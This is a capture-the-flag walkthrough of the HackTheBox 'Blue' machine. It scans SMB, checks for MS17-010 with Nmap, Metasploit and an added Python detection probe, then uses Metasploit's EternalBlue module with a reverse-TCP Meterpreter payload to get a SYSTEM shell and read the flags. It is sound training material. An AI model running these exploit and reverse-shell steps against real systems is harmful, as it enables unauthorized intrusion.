Blue HackTheBox WalkThrough
This is the Blue HackTheBox machine walkthrough, the 11th machine in our OSCP-like HTB boxes series. In this writeup I show step by step how I rooted the Blue HTB machine. First, a few facts about the box: it is a Windows machine with IP address 10.10.10.40, and its maker rated its difficulty as low.
The machine is currently retired, so you need a VIP subscription at hackthebox.eu to access it. Connect to the HackTheBox VPN and confirm connectivity to the Blue machine by pinging its IP 10.10.10.40. If that works, start hacking. As usual, I began by scanning the machine with Nmap (a port scanner); the command and its result are below:
$ nmap -sC -sV -oN blue.nmap 10.10.10.40
Nmap revealed several open ports: Microsoft RPC on port 135, the NetBIOS session service on port 139 and SMB on port 445. Of all the open ports, 135, 139 and 445 are the useful ones because they allow a lot of enumeration; tools such as enum4linux and rpcclient work against these three ports.
Before enumerating SMB shares on port 445, do not forget to test for the NSA's EternalBlue exploit, which was leaked by the Shadow Brokers hacker group in April 2017 and patched by Microsoft a month earlier in security bulletin MS17-010. (DoublePulsar, from the same leak, is the kernel implant that EternalBlue is normally paired with, not the exploit itself.) For more information about this exploit you should read the Wikipedia article on EternalBlue. So whenever you see SMB running on port 445 (or the NetBIOS session service on port 139), MS17-010 should be the first thing that comes to mind. To check whether the machine is vulnerable there is an Nmap script, smb-vuln-ms17-010.nse, and a Metasploit auxiliary module, auxiliary/scanner/smb/smb_ms17_010. Both probe the SMBv1 service for the missing MS17-010 patch, so they only give an answer while SMBv1 is enabled on the target. Either method is enough; I have used both just to show the vulnerability.
Checking for MS17-010
$ nmap -p 445 10.10.10.40 --script=smb-vuln-ms17-010.nse
smb-vuln-ms17-010.nse reports that the Blue machine is vulnerable to MS17-010. Let us confirm it with Metasploit's auxiliary module auxiliary/scanner/smb/smb_ms17_010.
msf5 > search eternalblue
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.10.10.40
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit
The Metasploit module also reports the host as vulnerable to MS17-010. A quick note on what Metasploit ships for MS17-010: searching for ms17_010 lists five modules, two auxiliary modules (the scanner used above and an admin module that runs commands over named pipes) and three exploit modules (ms17_010_eternalblue, ms17_010_eternalblue_win8 and ms17_010_psexec). Since we have confirmed the vulnerability, any of the three exploit modules can get us a shell. Keep in mind that ms17_010_eternalblue grooms the kernel pool and can occasionally crash the target, while ms17_010_psexec is the more reliable choice when an accessible named pipe exists. I tried the first one and got a shell easily.
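To make clear what the Nmap script and the Metasploit scanner are actually doing on the wire, here is a small raw-SMBv1 probe. It is an added example, not code from this walkthrough, from nmap or from Metasploit; it re-implements the same check those tools perform (null session, tree connect to IPC$, then a TRANSACTION2 request with the SESSION_SETUP subcommand 0x000E, classified by the NT status in the reply). Packet layouts follow the SMB1 specification; the function names and the default target 10.10.10.40 are my own choices, and the reply bytes used for the self-check at the bottom are constructed, so the packet builders and the classifier run without any host.

```python
"""MS17-010 probe over raw SMBv1 (added example, not the page's, nmap's or
Metasploit's code). Sequence: NEGOTIATE -> null SESSION_SETUP -> TREE_CONNECT
to IPC$ -> TRANSACTION2 with setup word 0x000E (SESSION_SETUP). An unpatched
SMBv1 server answers STATUS_INSUFF_SERVER_RESOURCES (0xC0000205); a patched one
rejects the request with STATUS_ACCESS_DENIED or STATUS_INVALID_HANDLE."""
import socket
import struct
import sys

SMB_HEADER = "<4sBIBHH8sHHHHH"   # 32-byte SMB1 header, little-endian
SMB_COM_TRANSACTION2 = 0x32
SMB_COM_NEGOTIATE = 0x72
SMB_COM_SESSION_SETUP_ANDX = 0x73
SMB_COM_TREE_CONNECT_ANDX = 0x75
TRANS2_SESSION_SETUP = 0x000E    # the subcommand the probe sends
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205
STATUS_ACCESS_DENIED = 0xC0000022
STATUS_INVALID_HANDLE = 0xC0000008


def smb_header(command, status=0, tid=0, uid=0, mid=0):
    # Flags 0x18: canonical, case-insensitive paths. Flags2 0x4001: request
    # 32-bit NT status codes and long names, ASCII (non-Unicode) strings.
    return struct.pack(SMB_HEADER, b"\xffSMB", command, status, 0x18, 0x4001,
                       0, b"\x00" * 8, 0, tid, 0xFEFF, uid, mid)


def nb_wrap(smb):
    # NetBIOS session service framing: type 0x00 + 24-bit big-endian length.
    return b"\x00" + struct.pack(">I", len(smb))[1:] + smb


def negotiate_request():
    dialects = b"\x02NT LM 0.12\x00"
    return nb_wrap(smb_header(SMB_COM_NEGOTIATE)
                   + struct.pack("<BH", 0, len(dialects)) + dialects)


def session_setup_request(mid=1):
    # Null session: zero-length passwords, empty account/domain/OS/LanMan.
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 0x1104, 2, 0, 0, 0, 0, 0,
                        0x00000050)  # capabilities: NT SMBs | NT status
    data = b"\x00" * 4
    return nb_wrap(smb_header(SMB_COM_SESSION_SETUP_ANDX, mid=mid)
                   + struct.pack("<B", 13) + words
                   + struct.pack("<H", len(data)) + data)


def tree_connect_request(host, uid, mid=2):
    # Password (1 byte), UNC path to IPC$, service "?????" (any).
    data = b"\x00" + ("\\\\%s\\IPC$" % host).encode() + b"\x00" + b"?????\x00"
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0, 1)
    return nb_wrap(smb_header(SMB_COM_TREE_CONNECT_ANDX, uid=uid, mid=mid)
                   + struct.pack("<B", 4) + words
                   + struct.pack("<H", len(data)) + data)


def trans2_probe_request(tid, uid, mid=0x41):
    # 14 TRANS2 words with every count/offset zero, then one setup word.
    words = struct.pack("<HHHHBBHIHHHHHBBH", *([0] * 13), 1, 0,
                        TRANS2_SESSION_SETUP)
    return nb_wrap(smb_header(SMB_COM_TRANSACTION2, tid=tid, uid=uid, mid=mid)
                   + struct.pack("<B", 15) + words + struct.pack("<H", 0))


def parse_header(packet):
    """Return (command, nt_status, tid, uid, mid) of a NetBIOS-framed reply."""
    if len(packet) < 36 or packet[4:8] != b"\xffSMB":
        raise ValueError("not an SMB1 packet")
    f = struct.unpack_from(SMB_HEADER, packet, 4)
    return f[1], f[2], f[8], f[10], f[11]


def classify(status):
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "VULNERABLE"
    if status in (STATUS_ACCESS_DENIED, STATUS_INVALID_HANDLE):
        return "PATCHED"
    return "UNKNOWN"     # e.g. SMBv1 disabled or a non-Windows server


def recv_smb(sock):
    head = sock.recv(4)
    if len(head) < 4:
        raise ConnectionError("connection closed")
    length = struct.unpack(">I", b"\x00" + head[1:])[0]
    body = b""
    while len(body) < length:
        chunk = sock.recv(length - len(body))
        if not chunk:
            break
        body += chunk
    return head + body


def check_ms17_010(host, port=445, timeout=5.0):
    """Run the probe against a live host; returns (verdict, nt_status)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        for pkt in (negotiate_request(), session_setup_request()):
            s.sendall(pkt)
            _, status, _, uid, _ = parse_header(recv_smb(s))
            if status != 0:
                raise RuntimeError("setup failed: 0x%08x" % status)
        s.sendall(tree_connect_request(host, uid))
        _, status, tid, _, _ = parse_header(recv_smb(s))
        if status != 0:
            raise RuntimeError("IPC$ tree connect failed: 0x%08x" % status)
        s.sendall(trans2_probe_request(tid, uid))
        _, status, _, _, _ = parse_header(recv_smb(s))
        return classify(status), status


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.40"
    verdict, code = check_ms17_010(target)
    print("%s: %s (NT status 0x%08x)" % (target, verdict, code))
```

Run it as python3 ms17_010_probe.py 10.10.10.40 over the VPN. Both scanners key on exactly this status code; the Metasploit scanner additionally sends a second TRANS2 probe to look for the DoublePulsar implant, which this example does not implement. Any status other than the three known ones is reported as UNKNOWN rather than guessed, which is what you will see when SMBv1 has been turned off.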
Getting User Shell
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.6
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
So we have a shell very easily, and with SYSTEM privileges at that. No privilege escalation is needed because the session already runs as NT AUTHORITY\SYSTEM, the most privileged account on a Windows host: the exploit corrupts memory inside the srv.sys kernel driver, so the payload is spawned with SYSTEM rights rather than as a logged-on user. I think the box is named Blue after the "Blue" in EternalBlue. Let's capture the user and root flags.
Capture User Flag
meterpreter > cat "C:\Users\haris\Desktop\user.txt"
Capture Root Flag
meterpreter > cat "C:\Users\Administrator\Desktop\root.txt"
This was how I rooted the Blue HackTheBox machine. It is a very easy box. I hope you learnt something new from this walkthrough; thanks for reading. For any suggestion or query related to the walkthrough, feel free to write to us at [email protected].
The next retired machine walkthrough is Nineveh.